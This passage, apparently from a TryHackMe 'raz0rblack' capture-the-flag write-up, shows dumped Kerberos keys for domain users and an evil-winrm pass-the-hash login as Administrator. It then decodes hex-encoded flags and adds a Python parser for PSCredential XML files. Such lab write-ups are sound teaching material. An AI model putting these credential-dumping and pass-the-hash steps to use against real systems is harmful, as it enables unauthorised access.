raz0rblack.thm\lvetrova:aes256-cts-hmac-sha1-96:3809e38e24ecb746dc0d98e2b95f39fc157de38a9081b3973db5be4c25d5ad39
raz0rblack.thm\lvetrova:aes128-cts-hmac-sha1-96:3676941361afe1800b8ab5d5a15bd839
raz0rblack.thm\lvetrova:des-cbc-md5:385d6e1f1cc17fb6
raz0rblack.thm\sbradley:aes256-cts-hmac-sha1-96:f790d6a749689497468b1eae5fa26bfa842446088115a4edc59730ee2d76436b
raz0rblack.thm\sbradley:aes128-cts-hmac-sha1-96:ffb39df24f1f980a096e14bca1a7fc33
raz0rblack.thm\sbradley:des-cbc-md5:409e45adf8dfe5a1
raz0rblack.thm\twilliams:aes256-cts-hmac-sha1-96:05bac51a4b8888a484e0fa1400d8f507b195c4367198024c6806d8eb401cb559  
raz0rblack.thm\twilliams:aes128-cts-hmac-sha1-96:a37656829f443e3fe2630aa69af5cb5a
raz0rblack.thm\twilliams:des-cbc-md5:01e958b0ea6edf07
[*] Cleaning up...

Now we simply connect with evil-winrm as Administrator using pass-the-hash to get a PowerShell session on the machine.

❯ evil-winrm -i raz0rblack.thm -u Administrator -H 9689931bed40ca5a2ce1218210177f0c  
PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator
PS C:\Users\Administrator\Documents>

In the Administrator's home we can see an xml, but this time it does not hold a credential.

PS C:\Users\Administrator> dir

    Directory: C:\Users\Administrator

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        5/21/2021   9:45 AM                3D Objects
d-r---        5/21/2021   9:45 AM                Contacts
d-r---        5/21/2021   9:45 AM                Desktop
d-r---        5/21/2021   9:45 AM                Documents
d-r---        5/21/2021   9:45 AM                Downloads
d-r---        5/21/2021   9:45 AM                Favorites
d-r---        5/21/2021   9:45 AM                Links
d-r---        5/21/2021   9:45 AM                Music
d-r---        5/21/2021   9:45 AM                Pictures
d-r---        5/21/2021   9:45 AM                Saved Games
d-r---        5/21/2021   9:45 AM                Searches
d-r---        5/21/2021   9:45 AM                Videos
-a----        2/25/2021   1:08 PM            290 cookie.json
-a----        2/25/2021   1:12 PM           2512 root.xml

PS C:\Users\Administrator> type root.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">Administrator</S>
      <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>  
  </Obj>
</Objs>
PS C:\Users\Administrator>

The string is just hexadecimal; we decode it with xxd and can see the flag.

❯ echo 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 | xxd -ps -r  
Damn you are a genius.
But, I apologize for cheating you like this.

Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.
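The three xml files on this box are Export-Clixml PSCredential documents, but their Password values differ in kind: lvetrova.xml and xyan1d3.xml hold a real SecureString, which Export-Clixml protects with DPAPI (keyed to the exporting user and machine, which is why Import-Clixml had to be run on the host as that user), while root.xml just holds hex-encoded text, as the xxd decode above shows. The following is an added example (not from the original post) that parses such a document and tells the two cases apart by the DPAPI blob header; PS_NS, parse_pscredential, classify_secure_string and both sample documents are assumptions constructed here.

```python
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"

# A CryptProtectData (DPAPI) blob starts with version 1 followed by the DPAPI
# provider GUID d08c9ddf-0115-11d1-8c7a-00c04fc297eb (GUID fields little-endian).
# ConvertFrom-SecureString / Export-Clixml wrap SecureStrings this way, bound to
# the exporting user and machine, so the blob cannot be opened elsewhere.
DPAPI_HEADER = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")


def _clixml(username, password_hex):
    """Build a minimal Export-Clixml PSCredential document (constructed sample)."""
    return f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">{username}</S>
      <SS N="Password">{password_hex}</SS>
    </Props>
  </Obj>
</Objs>"""


# Constructed samples: one DPAPI-protected (real header plus made-up bytes), one
# whose "SecureString" is only hex-encoded text, like the page's root.xml.
SAMPLE_DPAPI = _clixml("svc-example", (DPAPI_HEADER + bytes(range(32))).hex())
SAMPLE_HEX_TEXT = _clixml("Administrator", "THM{constructed-example-flag}\n".encode().hex())


def classify_secure_string(value):
    """Return ('dpapi', None), ('hex-text', decoded_text) or ('unknown', None)."""
    try:
        raw = bytes.fromhex(value)
    except ValueError:
        return "unknown", None
    if raw.startswith(DPAPI_HEADER):
        return "dpapi", None          # needs the owning user's DPAPI keys on the host
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return "unknown", None
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return "hex-text", text       # what `xxd -ps -r` recovered on the page
    return "unknown", None


def parse_pscredential(xml_text):
    """Extract UserName and classify Password from an Export-Clixml PSCredential document."""
    root = ET.fromstring(xml_text)
    for obj in root.iter(PS_NS + "Obj"):
        types = [t.text for t in obj.iter(PS_NS + "T")]
        if "System.Management.Automation.PSCredential" not in types:
            continue
        # Map property name -> (element tag without namespace, text); S = plain
        # string, SS = SecureString.
        props = {p.get("N"): (p.tag[len(PS_NS):], p.text or "")
                 for p in obj.find(PS_NS + "Props")}
        username = props.get("UserName", ("S", ""))[1]
        tag, password = props.get("Password", ("SS", ""))
        if tag == "S":                # stored as a plain string, not a SecureString
            kind, text = "plain", password
        else:
            kind, text = classify_secure_string(password)
        return {"username": username, "kind": kind, "password_text": text}
    raise ValueError("no PSCredential object in document")


if __name__ == "__main__":
    for doc in (SAMPLE_DPAPI, SAMPLE_HEX_TEXT):
        print(parse_pscredential(doc))
```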

In twilliams' home directory we can see an exe with a very long name; we can refer to it as def followed by * to shorten it.

PS C:\Users\twilliams> dir

    Directory: C:\Users\twilliams

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        2/25/2021  10:18 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        2/25/2021  10:20 AM             80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe  

PS C:\Users\twilliams> type def*
THM{5144f2c4107b7cab04916724e3749fb0}
PS C:\Users\twilliams>

Also, inside the Program Files directory there is a directory named Top Secret that contains only a png image file.

PS C:\Program Files\Top Secret> dir

    Directory: C:\Program Files\Top Secret

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/25/2021  10:13 AM         449195 top_secret.png

PS C:\Program Files\Top Secret> download top_secret.png

Info: Downloading C:\Program Files\Top Secret\top_secret.png to top_secret.png  

Info: Download successful!

PS C:\Program Files\Top Secret>

The image is just a humorous reference to a common beginners' problem, how to exit vim. The answer to that, and the secret, is simply :wq.